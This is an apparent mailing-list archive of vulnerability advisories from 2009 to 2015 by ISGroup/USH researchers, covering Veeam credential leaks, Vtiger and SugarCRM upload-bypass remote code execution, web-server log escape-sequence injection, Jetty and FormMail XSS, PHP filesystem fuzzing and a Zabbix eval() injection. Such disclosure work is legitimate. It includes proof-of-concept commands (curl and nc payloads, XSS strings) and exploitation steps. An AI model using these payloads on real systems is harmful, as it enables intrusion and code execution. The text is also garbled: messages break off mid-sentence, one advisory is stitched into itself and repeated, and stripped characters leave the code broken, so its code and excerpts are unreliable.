Veeam Backup & Replication Local Privilege Escalation Vulnerability

2015-10-09 Thread ascii
Veeam Backup & Replication Local Privilege Escalation Vulnerability

 Name  Sensitive Data Exposure in Veem Backup
 Systems Affected  Veeam Backup & Replication (B) v6, v6.5, v7, v8
 Severity  High 7.9/10
 Authors   Pasquale "sid" Fiorillo (sid AT ush DOT it)
   Francesco "ascii" Ongaro (ascii AT ush DOT it)
   Antonio "s4tan" Parata (s4tan AT ush DOT it)
 Date  20151002


Veeam Software provides backup, disaster recovery and virtualization
management software for the VMware and Hyper-V environments. In 2012
Veeam gained more than 1200 employees worldwide, from 10 employees in
2008. It has more than 157'000 customers, 33'000 partners and 80 top
industry awards and claims to be the "#1 VM Backup" solution after it
gained traction against competitors like Backup Exec and Tivoli Storage

Veeam Backup & Replication is the foundation of many Veeam products,
like Veeam Availability Suite and Veeam One.

ISGroup is an Italian Information Security boutique, we found this
0day issue while performing a Penetration Test for a customer, you
can discover more about ISGroup by visiting

Responsible disclosure with Veeam: Veeam has no public security@ contact
and we worked with them through the ticket system opening a case using
one of our customer's assistance contract. We were unable to escape
from the sternness of this type of communication and move to PGP emails.

Their response anyway was pretty prompt, we spoke first with Denis
Bodnar and then escalate to Fred Bozhanov, Veeam Support Management. He
managed communication with the developers. We advise Veeam to give some
of their senior developers a "security team" mandate and to expose such
team to external, direct, communication. The people we spoke to did
their best and were extremely kind but they must be supported by a
corporate process.

Prior vulnerabilities in Veeam: It's very difficult to say if Veeam had
previous vulnerabilities, there are no CVE assigned to this vendor both
on Nist and to it's CPE (cpe:/:veeam). Information to customers of the
vulnerability is shown in the "other" section of the changelog: "Removed
weakly encrypted username and password logging from guest processing
components using networkless (VIX) guest interaction mode. Veeam thanks
Pasquale Fiorillo and Francesco Ongaro of ISGroup for vulnerability

The latest version of the software at the time of writing can be
obtained from:


The vulnerability allows a local Windows user, even with low privileges
as the ones provided to an anonymous IIS's virtualhost user, to access
Veeam Backup logfiles that include a double-base64 encoded version of
the password used by Veeam to run.

The affected component is VeeamVixProxy, created by default on
installation and the user must be a privileged Local Administrator or
a Domain Administrator.

For example the wizard for adding a VMware or Hyper-V Backup Proxy
explicitly state "Type in an account with local administrator privileges
on the server you are adding. Use DOMAIN\USER format for domain
accounts, or HOST\USER for local accounts.".

We conservatively refer to this issue as a Local Administrator Privilege
Escalation but the use of Domain Administrator accounts is not
discouraged, if not advised, and we saw this pattern in our customer’s
production infrastructures.

TLDR: Anything able to read VeeamVixProxy logfiles, world readable by
default, can escalate to Local or Domain Administrator.


Veeam Backup & Replication (B) v6, v6.5, v7, v8 store VeeamVixProxy
logfiles in a directory accessible by Everyone and with permissions
that make them readable by Everyone (Everyone is, in the Microsoft
Windows terminology, the equivalent of the Unix’s nobody user).

Such logs, that are continuously generated, contain a Local or Domain
Administration user and password in an easily reversible (obfuscated)

In versions of Veeam prior to 8 a bug prevented log rotation [3,4], on
older systems there could be a large amount of logs and thus an
extensive history of past and current Local or Domain Administrator

A) Logfiles readable by Everyone

  As shown in the default log path is

  Windows Server 2003: %allusersprofile%\Application Data\Veeam\Backup
  Windows Server 2008 and up: %programdata%\Veeam\Backup

  Our evidence is for Windows Server 2003, access to the needed files
  are guaranteed to the Wi

Vtiger CRM 5.2.0 Multiple Vulnerabilities

2010-11-19 Thread ascii
) Vulnerabilities (post-auth, reflected)

A reflected XSS vulnerability exists in Vtiger CRM version 5.2.0.
The vulnerability can be exploited against authenticated users only.

The vulnerability is present due to insecure statements in the script
modules/Settings/GetFieldInfo.php that reflect unfiltered user inputs
inside the page output.

PoC URL that exploits this vulnerability:




Vtiger CRM 5.2.0 and possibly earlier versions are vulnerable.

Vtiger CRM can be identified using the following google dork:

- intitle:vtiger CRM 5 - Commercial Open Source CRM


No fix available.


We were able to reproduce the issues you reported on 5.2,
and are working on releasing a security update shortly.
We expect to release this update within the next 3 to 4 weeks,
after running some more tests.


CVE-2010-3909 [A]
CVE-2010-3910 [B]
CVE-2010-3911 [C, D]


20101009 Bugs discovered
20101012 First vendor contact
20101012 Vendor response (Sreenivas Kanumuru)
20101012 Contacted Steven M. Christey (
20101012 CVEs assigned by Steven M. Christey
20100102 Vtiger CRM team confirms vulnerability (Sreenivas Kanumuru)
20101015 Advisory release scheduled for 20101115
20101116 Advisory released


[1] Vtiger CRM 5.0.4 Multiple Vulnerabilities


Giovanni evilaliv3 Pellerano, Alessandro jekil Tanasi are credited
with the discovery of this vulnerability.

Giovanni evilaliv3 Pellerano
web site:,
mail: evilaliv3 AT ush DOT it

Alessandro jekil Tanasi
web site:
mail: alessandro AT tanasi DOT it


Copyright (c) 2010 Francesco ascii Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection

2010-01-11 Thread ascii
Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver,
Yaws and Boa log escape sequence injection

 Name  Nginx, Varnish, Cherokee, thttpd, mini-httpd,
   WEBrick, Orion, AOLserver, Yaws and Boa log escape
   sequence injection
 Systems Affected  nginx 0.7.64
   Varnish 2.0.6
   Cherokee 0.99.30
   mini_httpd 1.19
   thttpd 2.25b0
   WEBrick 1.3.1
   Orion 2.0.7
   AOLserver 4.5.1
   Yaws 1.85
   Boa 0.94.14rc21
 Severity  Medium
 Impact (CVSSv2)   Medium 5/10, vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)
 Authors   Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it)
   Alessandro jekil Tanasi (alessandro AT tanasi DOT it)
   Francesco ascii Ongaro (ascii AT ush DOT it)
 Date  20100110


nginx is a HTTP and reverse proxy server written by Igor Sysoev.
Varnish is a state-of-the-art, high-performance HTTP accelerator.
Cherokee is a very fast, flexible and easy to configure Web Server.
thttpd is a simple, small, portable, fast, and secure HTTP server.
mini_httpd is a small HTTP server.
WEBrick is a Ruby library providing simple HTTP web server services.
Orion Application Server is a pure java application-server.
AOLserver is America Online's Open-Source web server.
Yaws is a HTTP high perfomance 1.1 webserver.
Boa is a single-tasking HTTP server.


Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver,
Yaws and Boa are subject to logs escape sequence injection

Escape sequences are special characters sequences that are used to
instruct the terminal to perform special operations like executing
commands [4, 5] or dumping the buffer to a file [6, 7].

When the webserver is executed in foreground in a pty or when the
logfiles are viewed with tools like cat or tail such control chars
reach the terminal and are executed.



 A) nginx log escape sequence injection
   (Affected versions: 0.7.64 and probably earlier versions)

 B) Varnish log escape sequence injection
   (Affected versions: 2.0.6 and probably earlier versions)

 C) Cherokee log escape sequence injection
   (Affected versions: 0.99.30 and probably earlier versions)

 D) thttpd log escape sequence injection
   (Affected versions: thttpd/2.25b and probably earlier versions)

 E) mini_httpd log escape sequence injection
   (Affected versions: 1.19 and probably earlier versions)

 F) WEBrick log escape sequence injection
   (Affected versions: 1.3.1 and probably earlier versions)

 G) Orion log escape sequence injection
   (Affected versions: 2.0.7 and probably earlier versions)

 H) AOLserver log escape sequence injection
   (Affected versions: 4.5.1 and probably earlier versions)

 I) Yaws log escape sequence injection
   (Affected versions: 1.85 and probably earlier versions)

 L) Boa log escape sequence injection
   (Affected versions: 0.94.14rc21 and probably earlier versions)

A) nginx log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d  payload
nc localhost 80  payload

B) Varnish log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

xterm varnishlog

echo -en GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d  payload
nc localhost 80  payload

C) Cherokee log escape sequence injection

The following Proof Of Concept can be used in order to verify the

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

D) thttpd log escape sequence injection

The following Proof Of Concept can be used in order to verify the

echo -en GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d  payload
nc localhost 80  payload

E) mini_httpd log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d  payload
nc localhost 80  payload

F) WEBrick log escape sequence injection

One of the following two Proofs Of Concept can be used in order to

Jetty 6.x and 7.x Multiple Vulnerabilities

2009-10-26 Thread ascii
Jetty 6.x and 7.x Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in Jetty
 Systems Affected  Jetty 7.0.0 and earlier versions
 Severity  Medium
 Impact (CVSSv2)   Medium 5/10, vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)
 Authors   Francesco ascii Ongaro (ascii AT ush DOT it)
   Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it)
   Antonio s4tan Parata (s4tan AT ush DOT it)
 Date  20091024


Jetty is an open-source project providing a HTTP server, HTTP client and
javax.servlet container. These 100% java components are full-featured,
standards based, small foot print, embeddable, asynchronous and
enterprise scalable. Jetty is dual licensed under the Apache Licence
2.0 and/or the Eclipse Public License 1.0. Jetty is free for commercial
use and distribution under the terms of either of those licenses.

Jetty is used in a wide variety of projects and products: embedded in
phones, in tools like the the eclipse IDE, in frameworks like GWT, in
application servers like Apache Geronimo and in huge clusters like
Yahoo's Hadoop cluster.

The latest version at the time of writing can be obtained from:

Running Jetty 7.0.x is very easy, from the documentation page at:

- From an unpacked release directory of jetty-7,
  the server can be started with the command: java -jar start.jar

- This will start a HTTP server on port 8080 and
  deploy the test web application at: http://localhost:8080/test


Multiple Vulnerabilities exist in Jetty software.



 A) Dump Servlet information leak
(Affected versions: Any)

 B) FORM Authentication demo information leak
(Affected versions: Any)

 C) JSP Dump reflected XSS
(Affected versions: Any)

 D) Session Dump Servlet stored XSS
(Affected versions: Any)

 E) Cookie Dump Servlet escape sequence injection
(Affected versions: Any)

 F) Http Content-Length header escape sequence injection
(Affected versions: Any)

 G) Cookie Dump Servlet stored XSS
(Affected versions: =6.1.20)

 H) WebApp JSP Snoop page XSS
(Affected versions: =6.1.21)

A) Dump Servlet information leak
   (Affected versions: Any)

By requesting the demo Dump Servlet at an URL like /test/dump/
it's possible to obtain a number of details about the remote Jetty

Variables: getMethod, getContentLength, getContentType, getRequestURI,
getRequestURL, getContextPath, getServletPath, getPathInfo,
getPathTranslated, getQueryString, getProtocol, getScheme,
getServerName, getServerPort, getLocalName, getLocalAddr,
getLocalPort, getRemoteUser, getRemoteAddr, getRemoteHost,
getRemotePort, getRequestedSessionId, isSecure(), isUserInRole(admin),
getLocale, getLocales, getLocales

Plus a dump of all the HTTP request headers, the request parameters
and much more.

Five forms can be used to perform a series of functionality tests

  - Form to generate GET content
  - Form to generate POST content
  - Form to generate UPLOAD content
  - Form to set Cookie
  - Form to get Resource

While this is a feature we think that demo utilities should be
disabled by default. Many live deployments of Jetty exhibit demo
pages that leak important information and expose several vulnerabilites.

B) FORM Authentication demo information leak
   (Affected versions: Any)

An example application often erroneously deployed is the FORM
Authentication demo (logon.html and logonError.html pages) that uses
the standard j_security_check component.

By requesting the /test/logon.html page it's possible to detect the
presence of a Jetty installation.

As noted before we think that demo utilities should be disabled by

C) JSP Dump reflected XSS
   (Affected versions: Any)

It has been found that the demo JSP Dump feature is vulnerable to
reflected Cross Site Scripting attacks. This can be replicated by
issuing a GET request to the /test/jsp/dump.jsp page:

Any GET key and value that reach the remote is reflected unencoded.

The problem resides in the jsp/dump.jsp file from the
webapps/test.war archive.


%@ page import=java.util.Enumeration %
h1JSP Dump/h1

table border=1
trthRequest URI:/thtd%= request.getRequestURI() %/td/tr
trthServletPath:/thtd%= request.getServletPath() %/td/tr
trthPathInfo:/thtd%= request.getPathInfo() %/td/tr

   Enumeration e =request.getParameterNames();
   String name = (String)e.nextElement();
  thgetParameter(%= name %)/th
  td%= request.getParameter(name) %/td/tr
% } %



Vtiger CRM 5.0.4 Multiple Vulnerabilities

2009-08-18 Thread ascii
Vtiger CRM 5.0.4 Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in Vtiger CRM
 Systems Affected  Vtiger CRM 5.0.4 and possibly earlier versions
 Severity  Medium
 Impact (CVSSv2)   Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P)
 Authors   Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it)
   Antonio s4tan Parata (s4tan AT ush DOT it)
   Francesco ascii Ongaro (ascii AT ush DOT it)
 Date  20090818


Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.


Multiple Vulnerabilities exist in Vtiger CRM software.

Some of the technical issues highlighted in this advisory are part of a
wider publication, PHP filesystem attack vectors - Take Two, and are
generic to applications written in the PHP language:



 A) Remote Code Execution (RCE) Vulnerability
 B) Cross Site Request Forgery (CSRF) Vulnerabilities
 C) Local File Inclusion (LFI) Vulnerability
 D) Cross Side Scripting (XSS) Vulnerability

A) Remote Code Execution (Windows Only) Vulnerability

A Remote Code Execution vulnerability exists in Vtiger CRM version
5.0.4. In order to exploit this vulnerability an account on the CRM
system is required.

The vulnerability resides in the Compose Mail section. The software
permits sending email with attachments and offers a draft save feature.
When this feature is requested and an attachment is specified, the
saveForwardAttachments validation routine is called.

This routine involves some security checks to handle uploaded files, it
does blacklist extension checking and if a bad extension is detected the
txt extension is appended to the file-name.

The following is the specific section:

--8--8--8--8--8--8--8-Vtiger CRM 5.0.4 Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in Vtiger CRM
 Systems Affected  Vtiger CRM 5.0.4 and possibly earlier versions
 Severity  Medium
 Impact (CVSSv2)   Medium 6/10, vector: (AV:N/AC:M/Au:S/C:P/I:P/A:P)
 Authors   Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it)
   Antonio s4tan Parata (s4tan AT ush DOT it)
   Francesco ascii Ongaro (ascii AT ush DOT it)
 Date  20090818


Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.


Multiple Vulnerabilities exist in Vtiger CRM software.

Some of the technical issues highlighted in this advisory are part of a
wider publication, PHP filesystem attack vectors - Take Two, and are
generic to applications written in the PHP language:



 A) Remote Code Execution (RCE) Vulnerability
 B) Cross Site Request Forgery (CSRF) Vulnerabilities
 C) Local File Inclusion (LFI) Vulnerability
 D) Cross Side Scripting (XSS) Vulnerability

A) Remote Code Execution (Windows Only) Vulnerability

A Remote Code Execution vulnerability exists in Vtiger CRM version
5.0.4. In order to exploit this vulnerability an account on the CRM
system is required.

The vulnerability resides in the Compose Mail section. The software
permits sending email with attachments and offers a draft save feature.
When this feature is requested and an attachment is specified, the
saveForwardAttachments validation routine is called.

This routine involves some security checks to handle uploaded files, it
does blacklist extension checking and if a bad extension is detected the
txt extension is appended to the file-name.

The following is the specific section:


$ext_pos = strrpos($binFile, .);
$ext = substr($binFile, $ext_pos + 1);
if (in_array(strtolower($ext), $upload_badext))
$binFile .= .txt;


It's known that in some circostances (for example when the PHP handler
is configured using AddType/Action/AddHandler globally, eg. not inside
an Apache's Files/FilesMatch directive) blacklisting is not enough as
files in the form of will be mapped back to PHP
anyway (since foo is not explicitly defined in the MIME map and Apache
will try to guess the filetype by its own).

Beside this known issue we want to point out a less known exploitation
methodology that works on Windows hosts.

First the attacker has to find the name of the file that was uploaded
in the attachment list files. Vtiger CRM saves files

PHP filesystem attack vectors - Take Two

2009-07-27 Thread ascii
PHP filesystem attack vectors - Take Two

 Name  PHP filesystem attack vectors - Take Two
 Systems Affected  PHP and PHP+Suhosin
 Authors   Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it)
   Antonio s4tan Parata (s4tan AT ush DOT it)
   Francesco ascii Ongaro (ascii AT ush DOT it)
   Alessandro jekil Tanasi (alessandro AT tanasi DOT it)
 Date  20090725

II)   PHP arbitrary Local File Inclusion testing
III)  PHP arbitrary Local File Inclusion results
IV)   PHP arbitrary File Open testing
V)PHP arbitrary File Open results
VI)   PHP arbitrary Remote File Upload testing
VII)  PHP arbitrary Remote File Upload results
VIII) Conclusions
IX)   References

I) Introduction

This is the second part and continuation of our previous PHP filesystem
attack vectors [1] research.

Working with s4tan and ascii on the SugarCRM 5.2.0e Remote Code
Execution advisory [2] we noticed a strange behaviour on Windows OS:
trying to upload a file named a.php. results in just a.php.

Analyzing this we noticed that every time an application, or manually,
was trying to open or save a file with one ore more dots at the end,
Windows was not denying the operation, but it was removing the dots in a
transparent way.

Mindful readers probably have already spotted the issue.

We wanted to take our time for a deeper investigation about what
normalization issues were available and how to take advantage of them
in order to exploit arbitrary local file inclusion/handling and uploads
functionalities (not only on Windows OS but also on GNU/Linux and *BSD).

Below you can find the sources of two simple academic fuzzers, later
results are discussed and finally POCs and conclusions are proposed.

II) PHP arbitrary Local File Inclusion testing

This tests include(), include_once(), require(), require_once() and
similiar functions.





$InterestingFile = test_alfi.php;
$fh = @fopen($InterestingFile, 'w+');
fwrite($fh, ?php ?);

for ($i = 1; $i  256; $i++) {
 $chri = chr($i);
 for ($j = 0; $j  256; $j++) {
  $chrj = chr($j);
  for ($k = 0; $k  256; $k++) {
$chrk = chr($k);
if($chri.$chrj.$chrk == '://') continue;
if ($j == 0) $FuzzyFile = $InterestingFile.$chri;
else if ($k == 0) $FuzzyFile = $InterestingFile.$chri.$chrj;
else $FuzzyFile = $InterestingFile.$chri.$chrj.$chrk;
if(include($FuzzyFile)) {
print($i. .$j. .$k. [.$FuzzyFile.]\n);
if($j == 0) break;




Note: This code and the one that will be presented in section IV only
makes use of chars from the ASCII extended table (256 chars) to limit the
combinations because our intent was to test not only a malicious ending
char but a whole ending extension of 3 bytes.

A better fuzzer would include UTF-8. In the test we also do not
consider \x00, because this vector is already known [3, 4].

III) PHP arbitrary Local File Inclusion results


PHP 5.2.10-pl0-Gentoo

PHPFS_MAD2 $ php alfi_fuzzer.php
47 46 46 [test_alfi.php/.]
47 47 47 [test_alfi.php//.]


PHP 5.2.10-pl0-Gentoo + Suhosin-Patch 0.9.27

PHPFS_MAD2 $ php alfi_fuzzer.php



PHP 5.2.10-FreeBSD 7.3 + Suhosin-Patch 0.9.7

PHPFS_MAD2 $ php alfi_fuzzer.php



PHP 5.3.0 Windows XP (WampServer 2.0i install)

C:\PHPFS_MAD2 php alfi_fuzzer.php
! Valid chars are: \x20 ( ), \x22 (), \x2E (.), \x3C (), \x3E ()
! Valid strings are all combinations of the above chars.


PHP 5.3.0 Windows Server 2008 (WampServer 2.0i install)

C:\PHPFS_MAD2 php alfi_fuzzer.php
! Valid chars are: \x20 ( ), \x22 (), \x2E (.), \x3C (), \x3E ()
! Valid strings are all combinations of the above chars.


IV) PHP arbitrary File Open testing

This tests fopen() and similiar functions.





$MaliciousFile = test_afo.php;

for ($i = 1; $i  256; $i++) {
 $chri = chr($i);
 for ($j = 0; $j  256; $j++) {
  $chrj = chr($j);
  for ($k = 0; $k  256; $k++) {
if ($j == 0) $FuzzyFile = $MaliciousFile.$chri;
else if ($k == 0) $FuzzyFile = $MaliciousFile.$chri.$chrj;
else $FuzzyFile = $MaliciousFile.$chri.$chrj.chr($k);
$fh = @fopen($FuzzyFile, 'w+');
if ($fh != FALSE) {
fwrite($fh, $FuzzyFile);
if (file_exists($MaliciousFile

SugarCRM 5.2.0e Remote Code Execution

2009-06-15 Thread ascii
SugarCRM 5.2.0e Remote Code Execution

 Name  Remote Code Execution in SugarCRM
 Systems Affected  Sugar CRM 5.2.0e and possibly earlier versions
 Severity  High
 Impact (CVSSv2)   High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
 Authors   Antonio s4tan Parata (s4tan AT ush DOT it)
   Francesco ascii Ongaro (ascii AT ush DOT it)
   Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it)
 Date  20090613


From the SugarCRM web site: Sugar Express is designed for individuals
and small companies. Core CRM features help employees get on the same
page while more complex functionality is stripped away. Sugar Express is
ideal for providing a single view of the customer from the initial
marketing campaign through the sales cycle and on to customer support.
With Sugar Express, companies have a single system of truth for managing
customer interactions..


A Remote Code Execution Vulnerability exists in SugarCRM software.



A Remote Code Execution issue has been found in SugarCRM version
5.2.0e. In order to exploit this vulnerability an account on the system
is required.

The vulnerability resides in the Compose Email section. The software
permits sending email with attachments (if not disabled by the
administrator). When the name of the file is specified, a validation
routine is called:


function safeAttachmentName($filename) {
global $sugar_config;
$badExtension = false;
//get position of last . in file name
$file_ext_beg = strrpos($filename, .);
$file_ext = ;
//get file extension
if($file_ext_beg  0) {
$file_ext = substr($filename, $file_ext_beg + 1);
//check to see if this is a file with extension located in badext
foreach($sugar_config['upload_badext'] as $badExt) {
if(strtolower($file_ext) == strtolower($badExt)) {
//if found, then append with .txt and break out of lookup
$filename = $filename . .txt;
$badExtension = true;
break; // no need to look for more
} // if
} // foreach
return $badExtension;


This routine checks if the extension of the filename is blacklisted,
if so the .txt extension is appended to the filename. However there is
a coding error: the function assumes that the filename (extension
excluded) is at least one char long, this assumption is derived from the


if($file_ext_beg  0)


Of course this is a bad assumption, if we set the whole filename to
.php than the check is skipped and a void extension is assumed.
Because void extensions are not in the blacklist, no futher extension
is added to the filename. After this check a file is created on the
filesystem in the form idfilename.

Where id is an alphanumeric string. With the trick illustrated we are
able to create a file with .php extension. To do this upload a new
file attachment and set the filename to .php.

After this the attacker has to find the name of the file that was
uploaded in the attachment list files. To obtaint the real filename
look in the HTML response for a string like:


input value=6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php name=email_atta
chment0 id=email_attachment10 type=hidden


The real filename in this case is 6e25aba0-9dc4-2a57-8bae-4a1317b35d47.
php. Now the attacker has to find the directory where the file resides.

Again searching the HTML page for the attribute assigned_user_id
reveals the needed information:


a href=index.php?module=Emailsaction=ListViewassigned_user_id=abf7c7


At this point the attacker has all the informations to invoke the
uploaded file.

Filename: 6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php
Assigned user id: abf7c77b-2f71-8071-63ba-4a131068e9a2

To directly request it issue a request to:



As final note: if the user is administrator, assigned_user_id is
always 1.


SugarCRM 5.2.0e and possibly earlier versions are vulnerable.


Upgrade to latest version 5.2.0f


We have fixed the issue

Re: FormMail 1.92 Multiple Vulnerabilities

2009-05-13 Thread ascii
David Cantrell wrote:
 which to me looks like he's already addressed the issue by recommending
 that you use NMS formmail if you care about the quality of the code and
 any bugs.

Dear David,

telling people to use a different software doesn't automatically fix

As we tested FormMail and want to warn people who deployed FormMail and
will deploy FormMail we posted an advisory for FormMail. Hope this open
your mind.


FormMail 1.92 Multiple Vulnerabilities

2009-05-12 Thread ascii
FormMail 1.92 Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in FormMail
 Systems Affected  FormMail 1.92 and possibly earlier versions
 Severity  Medium
 Impact (CVSSv2)   Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
 Authors   Francesco ascii Ongaro (ascii AT ush DOT it)
   Giovanni evilaliv3 Pellerano (evilaliv3 AT ush DOT it)
   Antonio s4tan Parata (s4tan AT ush DOT it)
 Date  20090511


FormMail is a generic HTML form to e-mail gateway that parses the
results of any form and sends them to the specified users. This script
has many formatting and operational options, most of which can be
specified within each form, meaning you don't need programming knowledge
or multiple scripts for multiple forms. This also makes FormMail the
perfect system-wide solution for allowing users form-based user feedback
capabilities without the risks of allowing freedom of CGI access. There
are several downloading options available below and more information on
this script can be found in the Readme file. FormMail is quite possibily
the most used CGI program on the internet, having been downloaded over
2,000,000 times since 1997.


Multiple Vulnerabilities exist in FormMail software.



 A) Prelude to the vulnerabities
 B) Cross Site Scripting
 C) HTTP Response Header Injection
 D) HTTP Response Splitting

A) Prelude to the vulnerabities

What follows is the code used to validate the user input:

Line 283: $safeConfig array definition.


foreach $field (keys %Config) {
$safeConfig{$field} = clean_html($Config{$field});


Line 518: definition of clean_html function, used to generate the
$safeConfig array from $Config.


# This function will convert , ,  and  to their HTML equivalents.
sub clean_html {
local $value = $_[0];
$value =~ s/\/\amp;/g;
$value =~ s//\lt;/g;
$value =~ s//\gt;/g;
$value =~ s//\quot;/g;
return $value;


These functions are not always applied to the user input and don't
protect against all the attack vectors (as URI or DOM XSS that can work
also if encoded), this is why various vulnerabilities exist.

B) Cross Site Scripting vulnerability

Line 293: the redirect variable is used to write the location header
value. Its value is not filtered so it's possible to perform both
HTTP Header Injection and an HTTP Response Splitting attacks.

Since Header Injection is one of the most versatile attack vectors we
could use it (like downgrade it) to perform a Cross Site Scripting
attack but it would not represent a different vulnerability.

In this case we are already inside a Location response header and it's
possible to perform an XSS without splitting the response and using the
standard Apache page for the 302 Found HTTP status.


# If redirect option is used, print the redirectional location header.
if ($Config{'redirect'}) {
 print Location: $safeConfig{'redirect'}\n\n;


XSS vulnerability example:


$ curl -kis


HTTP/1.1 302 Found
Date: Sat, 11 Apr 2009 14:12:11 GMT
Server: Apache
Location: javascript:alert('USH');
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
title302 Found/title
pThe document has moved a href=javascript:alert('USH');here/a./p
addressApache Server at Port 80/address


Obiously the XSS is not automatic since browsers don't follow the
javascript: URI handler in the Location header.

A second XSS vulnerability, not based on HTTP tricks, exists: in the
following code the the $return_link variable is reflected (printed) in
the page body without any validation:


Line 371: the $return_link variable is printed in the page body
without any validation.


# Check for a Return Link and print one if found.#
if ($Config{'return_link_url'}  $Config{'return_link_title'}) {
 print ul\n;
 print lia

Zabbix 1.6.2 Frontend Multiple Vulnerabilities

2009-03-03 Thread ascii
Zabbix 1.6.2 Frontend Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in Zabbix Frontend
 Systems Affected  Zabbix 1.6.2 and possibly earlier versions
 Severity  High
 Impact (CVSSv2)   High 9.7/10, vector: (AV:N/AC:L/Au:N/C:P/I:C/A:C)
 Authors   Antonio s4tan Parata (s4tan AT ush DOT it)
   Francesco ascii Ongaro (ascii AT ush DOT it)
   Giovanni evilaliv3 Pellerano (evilaliv3 AT
   digitalbullets DOT org)
 Date  20090303


From the Zabbix web site: ZABBIX offers advanced monitoring, alerting
and visualization features today which are missing in other monitoring
systems, even some of the best commercial ones.


Multiple Vulnerabilities exist in Zabbix front end software.



 A) Remote Code Execution
 B) Cross Site Request Forgery
 C) Local File Inclusion

A) Remote Code Execution

A Remote Code Execution issue has been found in Zabbix version
1.6.2 and no authentication is required in order to exploit this
vulnerability. The Magic Quotes must be off in order to exploit
this vulnerability, however this feature will not be supported
starting with PHP 6.0 (ref.

Zabbix has a security feature that parses all incoming input for
possible bad chars with the help of the function check_fields() defined
in include/ The issue we have discovered is contained
in this input validation code.

Pages define an array of every used variable that derives from external
(GPC) input. An example of the mechanism is the following:


 config= array(T_ZBX_INT, O_OPT, P_SYS, IN(0,1), NULL),
 // actions
 groupid=array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
 hostid= array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
 start=  array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535).({}%.
 next=   array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
 prev=   array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
 // filter
 filter_rst= array(T_ZBX_INT, O_OPT, P_SYS, IN(array(0,1)), NULL),
 filter_set= array(T_ZBX_STR, O_OPT, P_SYS, null, NULL),
 userid= array(T_ZBX_INT, O_OPT, P_SYS, DB_ID, NULL),
 'filter_timesince'= array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
 'filter_timetill'= array(T_ZBX_INT, O_OPT, P_UNSET_EMPTY, null, NULL),
 'favobj'= array(T_ZBX_STR, O_OPT, P_ACT, NULL, NULL),
 'favid'=  array(T_ZBX_STR, O_OPT, P_ACT, NOT_EMPTY,
 'state'=  array(T_ZBX_INT, O_OPT, P_ACT, NOT_EMPTY,
'isset({favobj})  (filter=={favobj})'),



After the definition of the $fields array all the variables are
checked by the function check_fields().

The main step of the check_fields() function is:


foreach($fields as $field = $checks){
 $err |= check_field($fields, $field, $checks);


Following the check_field() function we have identified that the
function's main steps are the creation of some local variables using
list() and a consequent call of calc_exp() (which resides in the same


list($type, $opt, $flags, $validation, $exception) = $checks;


calc_exp()'s code is:


function calc_exp($fields,$field,$expression){
 if(zbx_strstr($expression,{})  !isset($_REQUEST[$field]))
  return FALSE;

 if(zbx_strstr($expression,{})  !is_array($_REQUEST[$field]))
  $expression = str_replace({},'$_REQUEST['.$field.']',$expression);

 if(zbx_strstr($expression,{})  is_array($_REQUEST[$field])){
 foreach($_REQUEST[$field] as $key = $val){
   $expression2 =
return FALSE;
  return TRUE;
 return calc_exp2($fields,$field,$expression);


As you can see we should be able to call calc_exp2(), our vulnerable
function, avoiding to fall into a breach that exits (returns) from the

Investigating calc_exp2()'s source:


function calc_exp2($fields,$field,$expression){
 foreach($fields as $f = $checks){
  $expression = str_replace('{'.$f.'}','$_REQUEST['.$f.']',$expression);

 $expression = trim($expression, );
 $exec = return (.$expression.) ? 1 : 0;;

 $ret = eval($exec);

 return $ret;


PHP filesystem attack vectors

2009-02-09 Thread ascii
PHP filesystem attack vectors

